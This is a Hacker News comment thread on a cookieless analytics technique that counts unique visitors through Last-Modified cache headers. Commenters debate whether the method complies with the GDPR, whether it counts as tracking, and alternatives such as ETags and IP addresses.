[HN Gopher] Using a date-modified header to detect unique visito...
___________________________________________________________________
Using a date-modified header to detect unique visitors without
using cookies
Author : mulhoon
Score : 306 points
Date : 2022-11-30 16:04 UTC (6 hours ago)
(HTM) web link (notes.normally.com)
(TXT) w3m dump (notes.normally.com)
| [deleted]
| a_c wrote:
| Looks like a nice middle ground between no tracking at all and
| needing full tracking to know how well your website performs. Seems
| no fingerprinting is involved so the website visitor is anonymized.
| Unlike cookies where we can store whatever we like, this method
| reveals only the unique visit, and its derivatives.
| alkonaut wrote:
| I very much prefer this to e.g fingerprinting. This is local to
| one site and basically uniqueness only rather than an identifying
| id. I don't feel "tracked" or "targeted" by this.
| schoen wrote:
| Martin Pool discovered pretty much this technique back in 2000:
|
| https://catless.ncl.ac.uk/Risks/20.86.html#subj10.1
| kiriberty wrote:
| Cringe moment, this is abusing the purpose that last-modified
| was created for
| someweirdperson wrote:
| "Counting unique visitors"?
|
| They are counting repeated requests. The unique count then is
| "total requests" minus "repeated requests".
|
| Wouldn't it be easier to count the number of times a cached
| resource is accessed?
| BeefWellington wrote:
| Time of last access + a counter of your visits once your hits
| reach N>2 is probably enough to separate an individual from the
| crowd here, unless your site is tremendously busy.
| jahewson wrote:
| The fact that this is being used in an analytics product that
| claims to be compliant with all privacy laws is horrifying.
| There's no way this is compliant _and_ it's deceptive.
| andix wrote:
| I agree. Well crafted laws (like the GDPR) forbid any kind of
| tracking without consent. It's the what and not the how. It
| doesn't matter if it's via cookies or any other way.
| pyrolistical wrote:
| Please explain why this isn't compliant?
| erdos4d wrote:
| This is a form of data collection and tracking that is
| definitely against GDPR unless the user is informed of it and
| consents to it. As it stands, there is no such notification
| or consent. IANAL but I strongly suspect this will get you fined
| in the EU.
| pyrolistical wrote:
| What personal information is being collected here?
| erdos4d wrote:
| GDPR doesn't just cover personal info, it also forbids
| tracking without consent, which includes cookies and
| other means. This is just a technical trick to track
| someone sans cookie, so I'm 100% certain they will fine
| anyone doing it unless they get consent.
| whartung wrote:
| Arguably this can become personally identifiable, much like a
| person's height of 7 feet becomes personally identifiable. How
| many 7 foot people live in Elko Nevada? (I have no idea,
| perhaps there's an entire colony of them.) But most very tall
| people, well, stand out. "You're that tall guy from Elko!"
|
| Early on, it's not personally identifiable. No doubt there
| can be a lot of folks visiting the site only 10 times and
| never again.
|
| But as someone continues to visit, they begin to narrow down
| who they are to "You're that guy that comes in here every day
| with a yellow hat". They may not "know" who you are but, they
| "know" who you are.
|
| Eventually, there may be that one person that has the highest
| hit rate, who always stands out.
| jefftk wrote:
| _> there may be that one person that has the highest hit
| rate, who always stands out._
|
| They could stop incrementing once they get to 10 (or
| something that's high but common enough to be shared by
| 1,000s of people).
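The capping idea above can be sketched in a few lines. This is only an illustration: the function name `capped_visit_count` and the default cap of 10 are assumptions taken from the comment, not from the article or any product.

```python
def capped_visit_count(prior_visits: int, cap: int = 10) -> int:
    """Clamp a visit counter so that all heavy visitors share one bucket.

    Hypothetical helper: once a visitor reaches `cap`, the stored value
    stops growing, so the most frequent visitor no longer stands out.
    """
    if prior_visits < 0:
        raise ValueError("prior_visits must be non-negative")
    return min(prior_visits, cap)


print(capped_visit_count(3))    # 3
print(capped_visit_count(250))  # 10
```

With a cap like this, the server can still tell new visitors from returning ones, but anyone past the cap is indistinguishable from everyone else past the cap.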
| Spivak wrote:
| > You're that guy that comes in here every day with a
| yellow hat
|
| Yes but you have absolutely nothing at all to associate
| that back to a person. Where are you going to find the data
| "personal information of some kind of the people who visit
| your site a lot?" You're not collecting it.
| bpfrh wrote:
| Because the GDPR isn't about any specific technology, but
| concerns any processing of personal data:
|
| https://gdpr.eu/what-is-gdpr/
|
| Edit: Huh, I stand corrected; I don't know if this would count
| as personal data.
| eurasiantiger wrote:
| Storing a cache header is not an issue, but if it is used
| as a unique identifier for user analytics purposes, it is
| almost certainly personally identifying information, at
| least after combining with other data. Since they are not
| disclosing that they store something they use to ID users,
| it is likely a GDPR violation, at least in spirit, and that
| spirit is exactly what GDPR seeks to control.
| bonestamp2 wrote:
| > after combining with other data
|
| The post says that they don't combine datapoints because
| that would negate privacy.
| eurasiantiger wrote:
| _They_ don't but anyone using their service could.
| ATsch wrote:
| It is personal data regardless of how it is used. The
| only question is if that use of personal data is
| permissible.
|
| Using it for user analytics, which is neither required to
| run the service, nor in the user's interest, nor
| reasonably expected by the user, is almost definitely
| illegitimate use.
| jahewson wrote:
| See my reply to b34r. In addition assigning users into
| "anonymous" cohorts is a similar principle to FLoC which is
| likely not GDPR compliant
| https://searchengineland.com/googles-current-floc-tests-
| aren...
| tobr wrote:
| That seems very different, as those cohorts are based on
| actual personal data (correct me if I've misunderstood this
| about FLoC). That's fundamentally different from a counter
| I think.
| jahewson wrote:
| Yes that's right, FLoC is explicitly using personal data.
| But now consider that that data is "you visited a
| gardening website in the past month" and compare it with
| "you visited this website 3 times yesterday" and the two
| methods don't look so different.
| tobr wrote:
| I guess we all have different instincts when it comes to
| this, but I find it much more expected and acceptable
| that a website can see that I'm returning, than that they
| get to know about random other interests I have based on
| my general browsing history.
| dahfizz wrote:
| > Processing personal data to generate the cohort
| assignment without the proper consent could also be a
| violation
|
| Using personal data to assign a cohort counts as using
| personal data. Duh. The approach described in the article
| doesn't use any personal data, though?
| eganist wrote:
| > Using personal data to assign a cohort counts as using
| personal data. Duh. The approach described in the article
| doesn't use any personal data, though?
|
| Quoting the European commission:
|
| "Personal data is any information that relates to an
| identified or identifiable living individual. Different
| pieces of information, which collected together can lead
| to the identification of a particular person, also
| constitute personal data."
|
| I'd hazard a guess that it's the second part under which
| the EC might find this to be within scope.
| dahfizz wrote:
| If I gave you a list of all the last-modified headers
| from a day, how would you use that information to
| identify a person?
| ATsch wrote:
| The definition of personal data under the GDPR is
| anything that can be used to uniquely identify a natural
| person (with sufficiently high probability). Both cookies
| and date-modified meet that definition identically, as do
| IP addresses.
|
| That doesn't mean you can't use it at all. It just places
| strong restrictions on what purposes you can use it for.
| The important point is just that those restrictions are
| the same under GDPR for all of these technologies. It
| doesn't matter how you uniquely identify users, what
| matters is what you do with that information.
| dahfizz wrote:
| They don't assign a unique date-modified to each user.
| They assign _everyone_ the _same_ date modified on their
| first visit of the day. I don't accept that this could
| be used to uniquely identify a natural person.
|
| You may be able to look at the headers and see that a
| certain user made the most requests that day. That still
| tells you nothing about their identity.
| mytailorisrich wrote:
| Nothing in the technique described here allows one to
| identify an individual directly or indirectly because
| 'identifiers' are not unique and really no different than
| standard 'last-modified' dates. Even if they were unique
| further data would have to be collected in order to be
| able to identify individuals and turn everything into
| personal data.
|
| What the technique may fall foul of, though, are cookie
| laws.
| Spivak wrote:
| You can't just scare quotes anonymous without explaining
| how it could deanonymize you. You're sitting there with
| full access to the count data they collect. Use any
| statistical methods you like, figure out what visits were
| me.
| mytailorisrich wrote:
| The article you quote does not suggest that "assigning
| users into "anonymous" cohorts is ... is likely not GDPR
| compliant" and I fail to see how that would be the case.
| Rather it seems to mention concerns that _processing
| personal data_ to do so may be problematic.
| b34r wrote:
| Why? It's anonymous and doesn't collect any user data other
| than IP and stuff from the user agent
| jahewson wrote:
| It's not anonymous in a low-entropy situation. A user can be
| indirectly identified. This would violate GDPR.
| CaveTech wrote:
| No it wouldn't.
| jahewson wrote:
| Yes it would because a unique time stamp allows me to
| indirectly identify a user.
| SparkyMcUnicorn wrote:
| How?
| kapep wrote:
| It is not a unique timestamp though. Each day, all
| visitors start at 00:00:00. All users that visit the site
| a second time get the timestamp 00:00:01 and so on.
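A minimal server-side sketch of the scheme as described in this comment, assuming the counter is the number of seconds past UTC midnight and that a header from an earlier day resets the count. The function name `next_last_modified` is hypothetical, and the article's actual implementation may differ.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional, Tuple


def next_last_modified(if_modified_since: Optional[str],
                       now: datetime) -> Tuple[str, int]:
    """Return (Last-Modified value to send, visits seen before this one).

    `now` must be timezone-aware. Every first visit of the day gets the
    same value (midnight UTC); each later visit gets one second more.
    """
    midnight = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0)
    prior_visits = 0
    if if_modified_since:
        try:
            seen = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):
            seen = None  # malformed header: treat as a first visit
        # Only trust timezone-aware values that fall within today.
        if (seen is not None and seen.tzinfo is not None
                and midnight <= seen < midnight + timedelta(days=1)):
            prior_visits = int((seen - midnight).total_seconds()) + 1
    header = format_datetime(midnight + timedelta(seconds=prior_visits),
                             usegmt=True)
    return header, prior_visits


now = datetime(2022, 11, 30, 16, 4, tzinfo=timezone.utc)
first, n1 = next_last_modified(None, now)
second, n2 = next_last_modified(first, now)
print(first, n1)   # Wed, 30 Nov 2022 00:00:00 GMT 0
print(second, n2)  # Wed, 30 Nov 2022 00:00:01 GMT 1
```

Because every visitor with the same number of prior visits receives the same header value, the value alone does not distinguish one visitor from another.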
| CaveTech wrote:
| Where are people getting these insane reads of GDPR? Any
| bit of entropy is not going to violate GDPR. First, an
| active client-server connection is required for any kind
| of supposed "identity" contained here, which would of course
| include far more unique bits of identity/entropy, such as
| IP. Secondly, even if the full DB of page view counts
| were leaked you could not actually use it to identify a
| user.
|
| You have somehow perverted GDPR to believe it to mean `no
| client may ever hold a unique state`. Good luck to anyone
| making a claim that this is NOT possible in anything but
| the most rudimentary application.
| pyrolistical wrote:
| I don't see how it can be used as described to identify an
| individual person.
|
| Multiple requests end up with the same time stamp which
| means individuals are not traceable but as an aggregate
| countable
| jahewson wrote:
| Only multiple requests within a given second get the same
| time stamp. So if you have less than 86k hits per day,
| then all your time stamps could be unique.
|
| Edit: I misread the article here, where it said each
| visit incremented the counter by one second. So my
| calculation is not correct!
| bradstewart wrote:
| But how do I then tie that unique timestamp to an actual
| _person_? Which is what GDPR is concerned about.
|
| (edit: spelling)
| dahfizz wrote:
| How do you go from timestamp to identifying someone?
|
| ~Every HTTP response has a Date field with a second-
| resolution timestamp that might be unique. Are you
| equally concerned about that?
| TylerE wrote:
| Birthday paradox means that will be far lower.
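The birthday-paradox point can be checked numerically. The sketch below assumes a hypothetical scheme in which each visitor independently receives a uniformly random second of the day, which is not what the article does (as later replies note); the function name is made up for illustration.

```python
def probability_all_distinct(visitors: int, slots: int = 86_400) -> float:
    """Chance that `visitors` random picks from `slots` values never collide."""
    if visitors > slots:
        return 0.0  # pigeonhole: a collision is guaranteed
    p = 1.0
    for i in range(visitors):
        p *= (slots - i) / slots
    return p


for n in (100, 350, 1000):
    print(n, round(probability_all_distinct(n), 3))
```

Under that assumption, collisions become likely after a few hundred visitors, long before the 86,400 available seconds are used up.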
| Thorrez wrote:
| No, they are truncating the timestamp to the day. So all
| visitors to the site on a specific day get the same
| initial timestamp.
| jahewson wrote:
| Ah so they are, thanks! That's much better. Though for a
| very, very low-traffic site this would still let me track
| unique visitors.
| genewitch wrote:
| It is designed to track unique visitors, but not
| differentiate between them at all.
|
| both you and i visit the same new site today, we both get
| a file our browser caches with today's date at 00:00:01.
| Tomorrow when we go to the same site, our browser says we
| got the file yesterday, so the server sends a new
| modified date to the browser, set to tomorrow's date at
| 00:00:02. Both of us have the same "new" file with the
| new modification date/time.
|
| if i go back the following day, the only thing the server
| knows for certain, from just this header, is that i've
| visited twice before. So i'm not counted as a unique
| visitor.
|
| That this could be used by assigning a _unique_ timestamp
| to each visitor is where everyone's mind is going, and
| it feels like half are annoyed there's another way to
| leak information, and the other half are annoyed they
| didn't think of it prior to the end-of-year marketing
| bonus deadline.
| [deleted]
| prpl wrote:
| Do people use etag for such purposes?
| cpeterso wrote:
| Yes. ETag tracking has been a thing for decades:
|
| https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags
| habibur wrote:
| This can be used like a cookie without using cookies as long as
| definition of cookie stays "...a cookie is a small file stored on
| your computer".
|
| You have 30 million seconds per year as unique identifier to be
| used against each individual for tracking. Even though the OP
| didn't do it.
|
| Put an expire time in between 10 years back to today and 300m
| users tracked.
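The arithmetic behind these figures can be verified quickly. The sketch ignores leap days, and `distinct_timestamps` is a hypothetical helper name.

```python
SECONDS_PER_DAY = 24 * 60 * 60  # Last-Modified has one-second resolution


def distinct_timestamps(days: int) -> int:
    """Number of distinct second-resolution timestamps in a span of days."""
    return days * SECONDS_PER_DAY


print(distinct_timestamps(365))       # 31536000, roughly 30 million per year
print(distinct_timestamps(365 * 10))  # 315360000, roughly 300 million per decade
```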
| superjan wrote:
| On the other hand, now that we know about it, it is easy to defeat:
| a privacy conscious browser will just add a random amount of
| minutes/seconds in the "if modified since" header. The only
| risk is you sometimes trigger a reload because the resource was
| modified in that interval.
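A client-side sketch of the jitter idea described above, assuming the browser holds the cached Last-Modified string and adds a random number of seconds before sending it back. The function name, the one-hour default, and the injectable `rng` parameter are all assumptions for illustration; no browser is known to implement exactly this.

```python
import random
from datetime import timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


def jittered_if_modified_since(cached_last_modified: str,
                               max_jitter_seconds: int = 3600,
                               rng: Optional[random.Random] = None) -> str:
    """Return an If-Modified-Since value shifted forward by random seconds."""
    rng = rng or random.Random()
    cached = parsedate_to_datetime(cached_last_modified).astimezone(timezone.utc)
    jitter = timedelta(seconds=rng.randint(0, max_jitter_seconds))
    return format_datetime(cached + jitter, usegmt=True)


print(jittered_if_modified_since("Wed, 30 Nov 2022 00:00:03 GMT"))
```

The jitter only moves the timestamp forward, so the cost is the one the comment mentions: a resource that really was modified inside the jitter window may be treated as unchanged or refetched unexpectedly.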
| Kuinox wrote:
| It's harder, but you still leak bits of information. If the
| random function is known, statistical analysis can still leak
| out a bit of information.
| [deleted]
| legitster wrote:
| Am I missing something? Abusing the cache meta-data to store data
| on the user device seems much worse than a cookie.
|
| I would have serious doubts of the longevity of such a trick, let
| alone some of the technical limitations I am sure the service
| has.
| bonestamp2 wrote:
| The missing piece is that no fingerprint is involved. They
| don't have a way of identifying that user, but they are still
| able to count the number of times that visitor loads the page.
| So, it's not a tracker, it's a counter. It's like a loyalty
| punch card at your local sandwich shop -- they can track how
| many times you've been there by counting the hole punches, but
| they don't have a unique identifier, so they can't track
| details about those visits.
|
| On the other hand, a cookie or a browser fingerprint contains
| info that can uniquely identify that user so it can be used for
| tracking.
| legitster wrote:
| A cookie doesn't _have_ to contain a fingerprint though.
|
| In the same way, nothing in their current method necessarily
| says they couldn't find a way to insert a fingerprint here.
| bonestamp2 wrote:
| Fair enough. At least they've told us how it works, so if
| the data no longer matches that methodology in the future
| then we can speculate that they've implanted a UID, unless
| they tell us how it works again and the data is consistent
| with the new methodology.
| o_m wrote:
| Cookie tracking without consent is illegal in Europe, so it is
| a clever way to still do some basic web analytics.
| roelschroeven wrote:
| Tracking without consent is illegal in Europe, _regardless of
| the method_. Alternative tracking methods are not workarounds
| to get around the law; they are only workarounds in trying
| not to be caught.
| atoav wrote:
| Yeah nice try. Law makers are not _that_ stupid. _Any_ way of
| storing personal data is subject to this regulation.
|
| And before you try the next thing, personal data is
| everything that can be linked to a specific user, e.g. IP
| addresses have been ruled to be personal data, some uuid that
| helps you identify a user as well.
|
| People should really read the law, and/or at least literate
| commentary on it instead of assuming things or repeating what
| someone else assumed.
| mytailorisrich wrote:
| This is definitely not personal data. The piece of
| information is not linked to an individual and cannot be
| used to identify an individual (not the same as a 'user'),
| not least because it is not unique to each visitor:
| According to the article all first requests get the same
| 'last-modified' date, same for all second requests, etc.
|
| Still, this stores data in the browser in a way that might
| be deemed a technology similar to a cookie, and therefore
| this might still fall within the various cookie laws, but
| this is completely outside of personal data regs.
| masklinn wrote:
| Tracking without consent is illegal. This is a clever way to
| get absolutely reamed, because you're not only in breach of
| data protection laws you're actively trying to obfuscate it.
| andix wrote:
| The obfuscation part is probably irrelevant from a legal
| perspective.
| baggy_trough wrote:
| This article is written like it's a great privacy breakthrough
| but why is this any different from dropping a user id cookie?
| jamincan wrote:
| Users might block cookies, but this will likely still go
| through.
| jagged-chisel wrote:
| How do you get more than 86,400 unique "identifiers" when they
| only change every second?
| marshray wrote:
| A malicious site can put a different identifier on every
| resource loaded by the browser.
|
| There really is no bottom, is there.
| koliber wrote:
| There are also many timezones and you can encode information
| in the timezone indicator as well. Also, you can use
| different days. You can stretch this number into millions.
| For a website that gets a certain number of unique visitors
| per year, this may be unique enough.
| tedunangst wrote:
| Subdomains. (Not sure why I immediately thought subdomains
| and not just multiple resources.)
| toast0 wrote:
| who says Last-Modified has to be a current date? you've got
| the potential for 1669827111 users as of when I was composing
| this comment without giving your users future dates.
| WirelessGigabit wrote:
| You don't have to. A unique visitor is someone who comes in
| without a last-modified header. Set the header, that person
| is no longer unique.
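The counting rule in this comment, combined with the earlier "total requests minus repeated requests" remark, can be sketched as follows. It assumes the server has a list of the If-Modified-Since values it received (with `None` or an empty string when the header was absent); `count_visitors` is a hypothetical name.

```python
from typing import Dict, Iterable, Optional


def count_visitors(if_modified_since_headers: Iterable[Optional[str]]) -> Dict[str, int]:
    """Count requests, splitting first-time visits from repeat visits.

    A request without the header is treated as a new (unique) visitor;
    a request that carries it has been seen before.
    """
    headers = list(if_modified_since_headers)
    total = len(headers)
    repeated = sum(1 for h in headers if h)
    return {"total": total, "repeated": repeated, "unique": total - repeated}


log = [None, "Wed, 30 Nov 2022 00:00:00 GMT", None, ""]
print(count_visitors(log))  # {'total': 4, 'repeated': 1, 'unique': 3}
```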
| nine_k wrote:
| It is materially different because it does not track individual
| users.
|
| It's comparable to dropping the same cookie to every visitor on
| a particular day; a pretty low level of privacy invasion.
|
| Also, this allows to _not_ use such things as visitor's IP
| address to collect meaningful statistics, which is a privacy
| win for the user, and an accuracy win for the site operator.
| kevincox wrote:
| Exactly this. It is different from dropping a user id cookie,
| but equivalent to dropping a cookie hit_count=0, hit_count=1,
| ...
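For comparison, the cookie equivalent mentioned above might look like this sketch using Python's standard `http.cookies` module. The cookie name `hit_count` comes from the comment; the function name and the reset-on-garbage behaviour are assumptions.

```python
from http.cookies import SimpleCookie
from typing import Tuple


def bump_hit_count(cookie_header: str) -> Tuple[int, str]:
    """Return (new count, cookie string to set) for a hit_count cookie.

    No cookie means a first visit (hit_count=0); otherwise add one.
    """
    jar = SimpleCookie()
    jar.load(cookie_header or "")
    count = 0
    if "hit_count" in jar:
        try:
            count = int(jar["hit_count"].value) + 1
        except ValueError:
            count = 0  # unparseable value: start over
    out = SimpleCookie()
    out["hit_count"] = str(count)
    return count, out["hit_count"].OutputString()


print(bump_hit_count(""))             # (0, 'hit_count=0')
print(bump_hit_count("hit_count=0"))  # (1, 'hit_count=1')
```

Like the Last-Modified counter, this stores only a count on the client, not an identifier, which is the equivalence the comment is pointing at.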
| baggy_trough wrote:
| Seems like the hit_count cookie would be a lot more
| straightforward.
| ChoHag wrote:
| politelemon wrote:
| If the counter is empty for you, disable your adblocker
| temporarily. The withcabin.com domain might be blocked.
| dahfizz wrote:
| Threads like this kinda make me sad about HN. Every single
| comment is about how this technique might possibly be abused to
| track users in very specific scenarios (i.e. you may be able to
| identify your most active user).
|
| If a web server wanted to track you, they would just use your IP.
| This is a clever technical trick to count your number of users
| without collecting any personal data. I don't understand why that
| is such a bad thing?
| zackmorris wrote:
| I think this cache date trick is clever!
|
| There are at least three fallacies with stuff like GDPR that
| trigger anxiety in people by convincing them that they can
| somehow safeguard their own privacy while surfing hundreds of
| websites per day, many in other countries. I'm not going to
| fully discredit them, just give counterexamples:
|
| 1) The internet can continue to work without tracking users
|
| - Targeted advertising (can't have both, although I can't say
| that I'll miss ads)
|
| 2) Users care that companies have their personally identifiable
| information (PII)
|
| - Users care how companies share and abuse their data for
| profit (they already know they're being tracked if they don't
| use something like TorBrowser)
|
| 3) Privacy protections actually result in privacy
|
| - PRISM and similar will always find you:
| https://en.wikipedia.org/wiki/List_of_government_mass_survei...
|
| So I view all of this security theater with utter skepticism. I
| think the only thing that can maybe save us is transparency.
| Letting users download their data and using the threat of audit
| to keep internet companies honest:
|
| https://securiti.ai/blog/dsar-rights-and-compliance/
|
| The rest of the squabbling about "no that's PII, you can't save
| that!" has only resulted in endless nagging and distraction.
| It's like trying to hide your address from the post office or
| thinking that your phone number is secret because it's not in
| the phonebook.
|
| Although I do think it's kind of funny to make big companies
| feel like they're living under a police state. They'll work
| tirelessly to undermine these protections, which is why we'll
| eventually abandon them like we did with prohibition and
| McCarthyism because they just aren't enforceable when everyone
| is breaking the law. Or (equally likely) they'll work to
| bolster these laws to create new markets through power
| imbalance, ensuring that only the largest companies can meet
| compliance and smaller companies pay some sort of protection
| money against the threat of litigation, which opens the door to
| mass corruption. Both of these scenarios are ugly enough that I
| think this entire rabbit hole is suspect.
| Sohcahtoa82 wrote:
| > If a web server wanted to track you, they would just use your
| IP.
|
| I'd think a HN user would know that using an IP to track isn't
| effective.
|
| For most home desktop users, at best, it tracks an individual
| household, not a person. For corporate users and highly
| privacy-conscious home users, it's probably completely
| worthless as VPNs will make everyone come from a single IP.
|
| For mobile users, it's completely worthless. You'd be tracking
| users of a specific WiFi network. If your phone is connecting
| via IPv4, then who knows who you're tracking, as phones on a
| mobile network will share an IP address.
| ketralnis wrote:
| And if you think VPN users are too obscure a use case to
| account for, a specific case I've dealt with is (1) all of
| AOL coming from one IP in Virginia (yes this was a while ago)
| and (2) almost every university appearing as a single IP (on
| a website frequented by university students)
| jgalt212 wrote:
| As recently as 2006, an entire country was behind a VPN
| using a single public IP address. If lore can be
| believed...
|
| https://superuser.com/questions/1013630/why-does-qatar-
| use-a...
| kccqzy wrote:
| Universities do that now? When I was in college, if one
| connects to the visitor network they'd give you a RFC1918
| address with NAT and a restrictive firewall, but if one
| connects to the regular network and authenticates as a
| student, they give you a publicly routable IP address.
| jesprenj wrote:
| Depends on a lot of factors. The primary school I was a
| student at had public IPs at every computer, our national
| academic and research network operators are encouraging
| local network operators to avoid private IPs. But the
| high school at which I'm currently a student, has private
| IP addresses on every computer and a single external IPv4
| for the entire facility. It's not so one sided.
| lazide wrote:
| Many will also push http/https proxies regardless of IP
| addressing schemes, so even if one user bypasses it,
| anyone using defaults will come from whatever the
| external proxy IP is.
| ketralnis wrote:
| I went to a community college that did transparent HTTP
| proxying with not just deep packet inspection but caching
| and "security"-oriented javascript injection. Headers
| would get reordered, and its parser wasn't perfect so
| multi-line headers would get broken sometimes. They'd
| inject JS into pages to scan for... something? Other
| injected JS? I have no idea. But it was impossible to
| directly connect to another server without going through
| their proxy even though from the TCP layer it looked like
| you were. Lots of difficult to debug issues.
| lazide wrote:
| Wow, that's impressively evil. Right up there with the
| old 'rewrite DNS traffic' trick from ISPs.
|
| Any idea what make/model the proxy was?
| mike_d wrote:
| At a previous job we tracked unique visitors to prevent ad
| fraud. You'd find not only individual IPs with thousands of
| users behind them, but also larger populations of users
| numbering in the tens of thousands behind a small block of
| 8-16 IPs.
|
| The craziest was a large multinational corporation that (I
| guess for security?) changed their egress IP daily. The
| first three octets remained the same and the fourth was
| equal to the day of the month UTC. Really screws things up
| when you use a 14 day rolling window of previous traffic
| for comparisons.
| bawolff wrote:
| I mean, i expect most people who use a vpn to also use
| incognito mode as well, which i assume would prevent this
| type of tracking.
| [deleted]
| IshKebab wrote:
| It's not a clever technical trick. It's a pointless technical
| trick.
|
| You can do exactly the same thing with cookies and they are
| better for privacy because there's an opt out mechanism.
| They're how you're _supposed_ to do this sort of thing.
|
| Using a trick like this is no different to cookies in the eyes
| of the GDPR. So the only reason to use this trick is if you
| don't want to respect your users' privacy by being able to
| block cookies.
| EGreg wrote:
| I mean, if people wanted to track visitors without cookies,
| they'd just use etags...
|
| https://www.secjuice.com/etag-entity-tag-tracking/
|
| Has Apple's ITP closed this particular loophole by ignoring
| etags in third party iframes and capping them to 7 days etc. ?
|
| It seems browsers will want to restrict ALL first party cookies
| to 7 days unless the visitor explicitly allows some domain to
| store their identity.
|
| Frankly speaking, identity can be done better without cookies.
| Look at Web3 sign-ins, we need something built into the browser
| and seamless. For now maybe an extension. Then browser makers
| can have a privacy mode that retires cookies, entirely.
|
| But how are you supposed to do caching without storing and
| sending identifying data equivalent to cookies?
|
| Thoughts?
| fanso99 wrote:
| My understanding is that most commenters are less critical of
| this specific implementation, but are alarmed by how this new
| technique could be used by other more nefarious parties in the
| future.
|
| Counting visits is probably still not a fully GDPR-compliant
| use case, as the server stores data on the client's machine
| which is indistinguishable from a cookie containing a counter.
| tinus_hn wrote:
| First, an IP address is considered personal data in the EU.
|
| Second, an IP address is not enough, it may change or be
| shared. The advertisers 'need' to track you forever to serve
| you relevant ads. So they devise all kinds of tricks to do so.
| aardvarkr wrote:
| > First, an IP address is considered personal data in the EU.
|
| I don't believe that's true. To my knowledge, GDPR only
| treats IP address as personal data if it is associated with
| actual identifying information (like name or address).
| Collecting IP address alone, and not associating it with
| anything else, is completely fine (otherwise nginx and
| apache's default configs would violate GDPR), and through
| them basically every website would violate GDPR.
| fanso99 wrote:
| Collecting IP addresses and linking them to a user ID is
| considered PII as far as I know.
| EGreg wrote:
| So the idea is that you can't legally collect information
| in private that you can technically collect.
|
| As long as a company is able to keep it a secret, they
| won't get caught.
|
| Witness the hundreds of violations of public trust by
| Facebook:
|
| https://www.independent.co.uk/tech/facebook-app-
| recording-ca...
|
| The only complete solution is technological!
| mytailorisrich wrote:
| That's correct. IP addresses are not personal data in
| themselves but they may become so if further data are
| collected or accessible which allow to identify individuals
| when used together with IP addresses.
| rzzzt wrote:
| CGNAT complicates matters even further. Sometimes I'm placed
| way off within <country> if a site tries to go by GeoIP
| databases, as the provider placed a bunch of households
| behind a single address.
| JohnFen wrote:
| After decades of straight-up abuse by this sector of the
| industry, including the subversion of countless "privacy
| respecting" data collection techniques, I think an
| extraordinary amount of skepticism and suspicion is more than
| understandable.
| kccqzy wrote:
| Why would you put privacy respecting in quotes? The
| subversion of those techniques is probably just because
| those techniques are so new and people haven't had better
| technologies yet.
|
| I personally consider those privacy respecting data
| collection techniques as a parallel with the development and
| use of cryptography on the web. In the beginning pretty much
| no one online used cryptography; later on we started using
| them but used weak ones ("export" cipher suites for example,
| or just look at the issues in early protocols like SSL 2.0 or
| SSL 3.0); nowadays almost everyone uses strong cryptography.
| Similarly, in the beginning pretty much no one cared about
| privacy when they did data collection; then we had begun to
| care more about privacy, but many schemes are easily broken
| due to for example misguided ideas of anonymization
| ("anonymization by hashing"), and we are also starting to see
| the development of newer private information retrieval
| schemes and differential privacy, etc. Unlike the cynics on
| this HN thread, I am quite confident that maybe a decade down
| the road the majority of data collection done by companies
| will be in a privacy preserving manner. Of course there will
| be outliers much like there are still websites that don't use
| https but those will be few and far between.
| JohnFen wrote:
| I quoted the term not with the intention of disparaging the
| notion, but to indicate that I'm referring to a specific
| class of approaches. That said, the term has also been
| abused to the point where when it's used, I immediately
| doubt that it's accurate.
| mozman wrote:
| Fingerprinting using WebRTC is far more effective. IPs are
| useless.
| nottorp wrote:
| We tend to object to people considering it normal to track us.
| Regardless of means.
| dahfizz wrote:
| This is not tracking. Could you explain why you think it is?
| fanso99 wrote:
| Storing a cookie with a counter still requires consent
| afaik. If I am right, then this technique is not
| sufficiently different and also requires consent.
| robertlagrant wrote:
| Why would that require consent?
| chriswarbo wrote:
| Consent is _always_ required; even if you just give
| people a random UUID, with no associated session/etc.,
| that _always_ requires consent.
|
| There is a separate question, of whether consent is
| implied. If the identifying information is required to
| provide the user with a service they requested (e.g. a
| cookie for their online shopping cart), then consent is
| implied; no need to ask.
| nottorp wrote:
| Could you explain why i should care, considering the
| current climate online?
|
| When you try to cram a list of 500 "legitimate interests"
| down my throat, I will consider no interest as legitimate.
|
| No matter what your goals are, you're in an industry that
| has zero trust these days.
| dahfizz wrote:
| Without viable alternatives, sites will continue to use
| Google Analytics. If people like you fear-monger every
| alternative, sites will continue to use Google Analytics.
|
| The method described in the article collects no personal
| data, collects no identifiable data, and is objectively
| more user-respecting than Google Analytics. But the
| behavior by people like you will help make sure that
| these alternatives don't gain traction and Google
| maintains their monopoly.
| EGreg wrote:
| Not only that. The ability to track your own visitors is
| BUILT INTO how the web operates.
|
| All a site has to do is include analytics in its server-
| side library. And that's it. Doesn't even need CNAME
| cloaking. It can send the analytics anywhere.
|
| The thing ITP and others try to stop is tracking users
| ACROSS sites.
|
| But if you use single-sign-on with FB or any other
| service, they can get your public photo, name and just
| find you on Facebook thru some search engine that
| spidered all profiles.
|
| So if you really want to be anonymous, stop using the
| single sign on and reusing passwords etc.
| ohbtvz wrote:
| But google analytics isn't viable. It's illegal to use in
| the EU. Here's an explanation by, well, a viable
| alternative to google analytics:
| https://matomo.org/blog/2022/05/google-analytics-4-gdpr/
|
| (I don't have a horse in this battle - my personal
| website doesn't have analytics at all.)
| stalfosknight wrote:
| How about we just _stop_ tracking users and hoovering up
| private data?
| xapata wrote:
| Who's "we"? I don't mind it. I want advertisers to give me
| more relevant advertising.
| mschuster91 wrote:
| I don't want _any_ unsolicited advertising - and I wish our
| societies would decide to outright _ban_ advertising:
| Outdoor advertising is a nuisance for the eyes, radio and
| TV advertising is annoying AF (particularly as it tends to
| be mixed at a much greater loudness than the program
| running, my conspiracy theory is that this is done so
| people are forced to hear it when they go to the loo),
| paper advertising (e.g. in newspapers, flyers or postal
| spam) is a waste of paper and online advertising is an
| insane danger for privacy and a vector for distribution of
| malware.
|
| Ideally, we'd have independent consumer protection
| entities, either government or private (e.g. German
| Stiftung Warentest), that would get products from companies
| to rank and test, so consumers could make actually informed
| decisions instead of being lured by hyped up advertising
| claims.
| dspillett wrote:
| Depends how you define relevant. Since actively trying to
| block stalky advertising behaviours I've had more
| interesting adverts (by "interesting" I mean new-to-me, not
| the "do you want another one of the thing you've already
| bought all you need of for a while" types). Things are
| relevant enough if, for instance, I get running related
| adverts while reading an article about other runners or
| browsing shoes.
|
